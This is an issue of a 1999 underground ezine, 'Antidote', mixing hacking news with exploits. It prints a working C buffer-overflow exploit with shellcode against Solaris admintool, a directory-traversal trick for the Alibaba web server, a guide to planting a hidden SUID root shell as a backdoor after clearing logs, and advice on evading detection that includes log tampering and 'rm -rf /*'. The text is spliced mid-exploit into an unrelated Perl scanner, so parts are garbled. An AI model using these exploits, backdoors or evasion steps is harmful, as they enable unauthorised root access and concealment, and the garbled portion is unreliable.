Volume 2 Issue 4 5/16/99 ** ** ***** * * ** * * *** ** *** ** ** *** ** * ** ** * ** ******** ** **** ******** * ** *** **** ******** *** *** ** * *** * ******** *** * ** **** **** * ** *** ********* * **** ** * *** * ** ** **** ** ** ** **** ** ** ** * *** * ** ** ** ** ** ** ** ** ** ** ** *** ********* ** ** ** ** ** ** ** ** ** ******** * ** ** ** ** ** ** ** ** ** ** ******* * ** ** ** ** ** ** ** ** ** ** ** ***** ** ** ** ** ** ** ** ****** ** **** * * **** ** * *** *** ** *** * ***** **** ** ******* * ** ** *** *** *** *** ***** * ** http://www.thepoison.org/antidote ------------------------------ Here is another issue of Antidote that has been released. Right now we have over 415 subscribers and getting more and more subscribers everyday. We are very sorry to say that we are not going to be sending Antidote as a attchment anymore because we have gotton so many subscribers that our mail server is going ape shit when we send them (we don't have a mail server just for Antidote). What we are going to start to do is just e-mail everyone the URL as to where they can download the new issue of Antidote. So you will start recieving e-mails about ever week telling you that a new issue of Antidote has been released and where you can get it. Sorry if this is an inconvience to anyone, but it is such a hassle to send this as an attachment cause of the mail server. The last issue that we sent as an attchment took us over 2 and a half hours to send to all of the users because of problems and the mail server kept crashing because of it. At Antidote, we never ask anything from anyone except articles in wich is optional, but now, if you could please visit our sponsor because we have to pay for the domain (www.thepoison.org) and it is getting to be to expensive to keep it up, though we don't want to take it down. So please take 2 seconds out of your time and please go to the fallowing URL and click on our sponsor: http://www.thepoison.org/popup.html The reason why we don't link the sponsor directly from here is because they have a refferal page where you type in the URL of the page that will have the link on it and if the refferal does not come from that page, then the 'hit' does not count. So please go to that URL and click on our sponsor! --=\\Contents\\=-- 0.00 - Beginning 0.01 - What? 0.02 - FAQ 0.03 - Shouts 0.04 - Writing 1.00 - News & Exploits 1.01 - Alibaba 2.0 1.02 - CIH has gone 'phoney' 1.03 - Admintool Overflow 1.04 - Corel Virus 1.05 - Check.pl 1.06 - SSHD Root 2.00 - Misc 2.01 - Root : Anytime 2.02 - How Not to Get Caught 2.03 - Trojan Ports ------------------------------ 0.01 --=\\What?\\=-- What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, cause that would be wrong. We don't claim to be a hacking magazine. All Antidote is, is basically current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on there hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc, then you might want to go to your local bookstore and see if they carry '2600'. ------------------------------ 0.02 --=\\FAQ\\=-- Here are a lot of questions that we seem to recieve a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions and if the question isn't on here or doesn't make sense, then you can e-mail us with your question. > What exactly is "Antidote"? See section 0.01 for a complete description. > I find Antidote to not be shot for the beginner or does not teach you the basics, why is that? Antidote is for everyone, all we are basically is a news ezine that comes out once a week with the current news, exploits, flaws and even programming. All of the articles that are in here are recieved second hand (sent to us) and we very rarely edit anyone's articles. > I just found Antidote issues on your webpage, is there anyway I can get them sent to me through e-mail? Yes, if you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will recieve Antidote the second we release it and the e-mail will contain a hyperlink to the URL in wich you can download the current issue. > If I want to submit something, are there any 'rules'? Please see section 0.03 for a complete description. > If I submitted something, can I remain anonymous? Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say. > I submitted something and I didn't see it in the current/last issue, why is that? It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues off Antidote. > Can I submit something that I didn't "discover" or "write"? Yes you can, we take information that is written by anyone regardless if you wrote it or not. Well thats it for our FAQ. If you have a question that is not on here or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month. ------------------------------ 0.03 --=\\Shouts\\=-- These are just some shout outs that we feel we owe to some people. Some are individuals and Some are groups in general. If you are not on this list and you feel that For some reason you should be, then please contact Lord Oak and he will post you on here and we are sorry for the Misunderstanding. Well, here are the shout outs: Lord Oak EazyMoney Duece Astral Black Magick oX1dation Forlorn Retribution 0dnek www.thepoison.org Serial Killer Jaynus Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you. ------------------------------ 0.04 --=\\Writing\\=-- As many of you know, we are always open to articles/submittings. We will take almost anything that has to do with computer security. This leaves you open for: -Protecting the system (security/securing) -Attacking the system (hacking, exploits, flaws, etc....) -UNIX (really anything to do with it...) -News that has to do with any of the above.... The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it. Also, please note that if we recieve two e-mails with the same topic/idea then we will use the one that we recieved first. So it might be a good idea to e-mail one of us and ask us if someone has written about/on this topic so that way you don't waste your time on writing something that won't be published. An example of this would be: If Joe sends me an e-mail with the topic being on hacking hotmail accounts on thursday. And then Bill sends us an e-mail on hacking hotmail accounts on sunday, we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue! If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it). ------------------------------ _________________________________ ) ___ ( ( //___/ / // ) ) // ) ) ) ) /____ / // / / __ / / ( ( / / // / / ) ) ) ) / / ((___/ / ((___/ / ( ( http://www.403-security.org ) ) For the latest hacks and news ( (___________________________________) 1.01 --=\\Alibaba 2.0\\=-- I've found a security hole in the web server Alibaba 2.0 (the latest version). I haven't tried it on any other version. Here's an example: If you install it so the web root is located in c:\alibaba\HtmlDocs\ you can send an URL: http://www.server.se/../../winnt/file.txt and get the "file.txt" file. This works all over the disk Alibaba is installed on. If directory browsing isn't allowed you have to know the pathname of the file you want. If directory browsing is allowed you can start at the disk root directory, but you have to enter the directories by hand when browsing, because the server will assume they are located in the web root, so if you just click around all you'll get is lots of 404's. /Arne Vidstrom- comment for Russ to be removed when posting out on the list - I haven't contacted the vendor at all. ------------------------------ 1.02 --=\\CIH has gone 'phoney'\\=-- [www.cnn.com] A fast-traveling rumor that the Chernobyl virus that melted down at least 600,000 computers worldwide last month would wreak havoc on cellular phones in Lebanon on Saturday tangled telephone lines and briefly shut down Lebanon's telephone network. Lebanese flipped off their mobiles and picked up traditional telephones to warn friends and family to do the same. The panic in this cellular-loving country overloaded the network, disrupting service for a few minutes, Ad-Diyar daily newspaper reported Sunday. Losses from the drop in cellular calls amounted to dlrs 30,000, the newspaper reported. The Chernobyl virus, timed to strike computers on the April 26 anniversary of the Chernobyl nuclear disaster, tries to erase a computer's hard drive and write gibberish into system settings. Parliament was considering an investigation into the source of the rumor, which Lebanon's two cellular companies scrambled in vain to debunk as technically implausible. Reporters tried Saturday to reach the Lebanese communications minister about the scare, according to the London-based Al-Hayat newspaper. His two cellular phones, however, were shut off. http://www.cnn.com/WORLD/meast/9905/09/lebanon.cell.hoax.ap/ ------------------------------ 1.03 --=\\Admintool Overflow\\=-- /*============================================================================= admintool Overflow Exploits( for Sparc Edition) The Shadow Penguin Security (http://base.oc.to:/skyscraper/byte/551) Written by UNYUN (unewn4th@usa.net) [usage] % setenv DISPLAY yourdisplay (ex. setenv DISPLAY 192.168.0.100:0.0) % gcc ex_admintool.c (This example program) % a.out ( [Browse] -> [Software] -> [Edit] -> [Add] -> [Harddisk] -> Directory: /tmp -> [Ok] ) # In /tmp/EXP directory, the temp files are made, please remove it. ============================================================================= */ #include #define ADJUST1 2 #define ADJUST2 1 #define BUFSIZE1 1000 #define BUFSIZE2 800 #define OFFSET 3600 #define OFFSET2 400 #define PKGDIR "mkdir /tmp/EXP" #define PKGINFO "/tmp/EXP/pkginfo" #define PKGMAP "/tmp/EXP/pkgmap" #define NOP 0xa61cc013 char exploit_code[] = "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68" "\x90\x0b\x80\x0e\x92\x03\xa0\x0c" "\x94\x10\x20\x10\x94\x22\xa0\x10" "\x9c\x03\xa0\x14" "\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc" "\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01" "\x91\xd0\x20\x08" ; unsigned long get_sp(void) { __asm__("mov %sp,%i0 \n"); } unsigned long ret_adr; static char x[500000]; FILE *fp; int i; main() { system(PKGDIR); putenv("LANG="); if ((fp=fopen(PKGMAP,"wb"))==NULL){ printf("Can not write '%s'\n",PKGMAP); exit(1); } fclose(fp); if ((fp=fopen(PKGINFO,"wb"))==NULL){ printf("Can not write '%s'\n",PKGINFO); exit(1); } fprintf(fp,"PKG="); ret_adr=get_sp()-OFFSET; while ((ret_adr & 0xff000000) == 0 || (ret_adr & 0x00ff0000) == 0 || (ret_adr & 0x0000ff00) == 0 || (ret_adr & 0x000000ff) == 0) ret_adr += 4; printf("Jumping address = %lx\n",ret_adr); memset(x,'a',4); for (i = ADJUST1; i < 1000; i+=4){ x[i+3]=ret_adr & 0xff; x[i+2]=(ret_adr >>8 ) &0xff; x[i+1]=(ret_adr >> 16 ) &0xff; x[i+0]=(ret_adr >> 24 ) &0xff; } x[BUFSIZE1]=0; fputs(x,fp); fprintf(fp,"\n"); fprintf(fp,"NAME="); memset(x,'a',4); for (i = ADJUST2; i < BUFSIZE2; i+=4){ x[i+3]=NOP & 0xff; x[i+2]=(NOP >> 8 ) &0xff; x[i+1]=(NOP >> 16 ) &0xff; x[i+0]=(NOP >> 24 ) &0xff; } for (i=0; i$MAXLEVEL) { print STDERR "ERROR: Max recursion met - directory structure deeper than $MAXLEVEL directories. That's bad. You can change the default in the script, or you can see if you can find any circular symlinks that are causing the problem. Check the end of your output for clues.\n\n"; die "ERROR: Max-eval-depth error.\n"; } opendir HANDLE, "$dirname" or return(-1); my @allfiles = readdir HANDLE; # print "Reading info on \"$dirname\"...\n"; TORTURE: foreach my $file (@allfiles) { my $foobar; if($dirname eq "/") { $foobar = $dirname . $file; } else { $foobar = $dirname. "/". $file; } # print "\"$foobar\" level $level\n"; if(($file eq ".") or ($file eq "..")) { # Go on your merry way...ignore this one. } # If the file is writeable, and doesn't belong to the user running # this script, then it gets reported. elsif((-W $foobar) and (not (-O $foobar))) # File is writeable&&!owned { # If it's a directory, report it as such. if(-d $foobar) # File is a directory { print "\"$foobar\" ### WRITEABLE DIR\n" } else { my $fileinfo=`ls -l "$foobar"`; chomp($fileinfo); print "\"$fileinfo\" ### WRITEABLE\n"; } # End else } # End elsif elsif(-l $foobar) { # my $fileinfo=`ls -l "$foobar"`; # chomp($fileinfo); # print "\"$fileinfo\" ### SYMLINK\n"; # Symlink evilness. Especially with GNOME. :( } elsif(-d $foobar) # File is a directory { # File is a directory - recurse through it # DEBUG: print "Entering \"$file\" coming from \"$dirname\"\n"; my $tmp=dirinfo($foobar, ($level+1)); if($tmp == -1) { print "Directory $foobar not readable with your sorry UID.\n"; } } elsif(-u $foobar) # File is SUID { my $fileinfo=`ls -l "$foobar"`; chomp($fileinfo); print "$fileinfo ### SUID\n"; } elsif(-g $foobar) # File is SGID { my $fileinfo=`ls -l "$foobar"`; chomp($fileinfo); print "$fileinfo ### SGID\n"; } elsif(-k $foobar) # File is sticky { my $fileinfo=`ls -l "$foobar"`; chomp($fileinfo); print "$fileinfo ### STICKY\n"; } else { # DEBUG2: print "\"$foobar\" doesn't look very interesting to me.\n"; } } # End foreach } # End dirinfo ------------------------------ 1.06 --=\\SSHD Root\\=-- When was the last time you rebuilt all privileged (`suid root') applications when upgrading a unix system, just in case? I'm pretty sure one can find `small print' that demands this, however I'm equally sure that hardly any system manager does so, since problems seem to occur _very_ rarely. Here's a neat one: Some time prior to the upgrade, system manager (S.M.) was asked to install `sshd' on a not-so-common platform (nothing really security-relevant, machine used for raw speed only, users just being accustomed to that sort of login). Said platform (featuring a particularly elaborate user data base) requires some special calls (simple calling sequences) to be done during `login' - no problem, `sshd' knows about them, although not explicitly aware of the particular hardware. Cautiously, S.M. configures `sshd' to not allow `root' logins from the outside. What other harm could it possibly do? Upgrade has to occur somewhat in a hurry, release documentation isn't on-site, but procedures are known well enough. S.M. asks the manufacturer's support representative if special precautions have to be taken, "errr, not that I'd think so". S.M. installs new version, all fine & dandy, even remembers to check out `sshd' afterwards and finds it to work the same as before. A couple of days later, S.M. logs in via `sshd' himself, and for the first time enters `su'. Gets very amazed at the new system's intelligence, as it knows to not ask him for a password. Minutes later, S.M. recognizes that `su' would never ask for a password, when the parent process had been created via `sshd' ... in spite of no other visible peculiarities with that process. A re-build (pretty likely boiling down to nothing but a re-link) of `sshd' fixed the problem. Quite a few years ago, when I saw the first mention of `ssh', I commented "If you're a bank, you don't buy your safe at a flea market; if you're not, you might be better off without a safe". Maybe there's _some_ truth in it, after all. Imagine uSoft going open source, and no-one going to have a look at it... ------------------------------ 10001010100101110101010101001011101010101000 0 1 1 Y88b Y88 888 888 888 88e e88'Y88 0 1 Y88b Y8 888 888 888 888b d888 'Y 1 0 b Y88b Y 8888888 888 8888D C8888 1 0 8b Y88b 888 888 888 888P Y888 ,d 1 1 88b Y88b 888 888 888 88" "88,d88 0 1 1 1 http://www.nudehackers.com 0 0 0 01001010110101010001011010010111010100101011 2.01 --=\\Root : Anytime\\=-- After gaining root access to a server you always risk the chance of losing access. The admin may change the password or fix the hole allowing a root shell. Well now you have a way to keep that root shell. The admin can change the password or fix the security hole. As long as you have local access, you have root access. Down to the nitty gritty. In the /bin dir there is file named sh. This is the actual shell. By running this the user will have shell access to the user that owns it. Once you have root on the computer, after you fix the logs and the .bash_history, go to the /bin dir and copy sh to a dir with permissions of 777 (or that you have access to.). After you have finished go back and change permissions on the dir to 700 so no one else can access this without knowing the file name and where it is. If you have an account the box simply create a dir inside your home dir where you can hide it. If you don't have access then you can copy it to the /tmp dir or even make a different and hide it. To hide the dir instead of a name such as HERE, use .HERE. The period in front will hide it from ls(using ls -a will show it). Now once you have sh in that dir chmod it to 4777 this will modify the setuid bit, allowing it to set the userid of the person who ran the file, to userid of the owner of the file, in this case root. Now time to hide this file. In case you dir is found or viewed hide the file. Again instead of leaving the name sh name it .sh, or even go father and name it something other than sh so its not as noticalbe. Now you have a ROOT SHELL any time. This also works with users other than root. Heres a lil example: [root@hacked box]$ mkdir /home/forlorn/.here [root@hacked box]$ chmod 777 /home/forlorn/.here [root@hacked box]$ copy /bin/sh /home/forlorn/.here [root@hacked box]$ cd /home/forlorn/.here [root@hacked box]$ chmod 4777 sh [root@hacked box]$ mv sh .jk [root@hacked box]$ su forlorn password: [forlorn@hacked box]$ cd .here ./.jk bash# whoami root heh :) rootshell anytime Forlorn forlorn@Nudehackers.com ------------------------------ 2.02 --=\\How Not to Get Caught\\=-- Lots have said it. "I am scared to hack because I might get cought and go to jail!!!", etc, etc, etc. You've all seen it before. There are plenty of ways to be catious. And not to get cought(or get on the publics and medias good side if you do). When hacking any type of *nix system, always check /etc/syslog.conf and check to make sure all the logs were takin care off. A good Sys Admin will log in more places then in /var/log/. Ya know? Among other things, DONT EVER DELETE OR MODIFY UNNESSISARY FILES. EVER. of course, unless the admin has completly made of fool of you, then feel free to do a rm -rf /* if you like. =P If you are patient, you could always commence your hack of a machine/network over a period of time to lower suspision. Lots of logs in 1 night of you attacking would be noticed easier by a admin/log-checker then one over a period of 2 weeks or soo. Attacking patiently will reduce the chances of you being noticed while tryin to gain access. This is a mistake many new skool hackers have made. Braggin bout your hacks. Posting on 500 usenets and bbs's saying "Y0 F00LZ I H4K0R3D FBI.GOV" will get you busted real fast, if you catch my drift. Keep your major hacks to yourself and/or you group. You should have pride in your hacks, and knowing that no one else knows you are there is a great feeling that you know you have truely gained access to a computer as a ghost. Of course, you could just be having a bad day, and you just forget to clean one little thing out and the admin notices. First off, the action takin to a hacker is greatly exhagereated. A admin of a machine in the middle of bumfuck ohio mailin your ISP about a hack wont do much to ya. Most ISPs, when told about criminal activity just cancel your account, and thats it. Unless it is federal, international, or had something to do with banks or large corps. Lets just say, you wont go to jail for hacking anything worth under $50k. =) heh. Now, if it is big, and you get cought hacking, say, looking at planes for the new F-22 stealth fighter curcitry plans, you will go to court swiftly. This is when your not deleting or modifying comes in handy. The media will glorify you as a victim if you just simply say, "I was reading some very interesting information about the unclassified planes". They will give you the publics love, and that is good! heh. out of all my experience, the above are the most importent things I have learned to do and abide by. Remmember, more then 100X's the new skool(malicious) hackers are caught then us oldskool hackers! Jaynus http://Security.Jaynus.Com ------------------------------ 2.03 --=\\Trojan Ports\\=-- After seeing several questions about traffic directed at ports as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack´99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future). To help anyone to detect trojan attacks, I´m planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I´ll love to get my hands on them, but please mail me first, as I don´t need more than one copy. If you have live experiance of trojan attacks I´m interested to read about your findings. Joakim joakim.von.braun@risab.se ------------------------------ Please visit: http://www.thepoison.org/popup.html and click on our sponsor(s) please! Please go there and just take 2 seconds to click there because we have to pay the bills somehow. _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _| _|_| _| _|_| _| _| _| _| _| _| _| _| _| _| Antidote is an HNN Affiliate _| _| http://www.hackernews.com _| _| _| _|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_|_| All ASCII art is done by Lord Oak and permission is needed from him before using.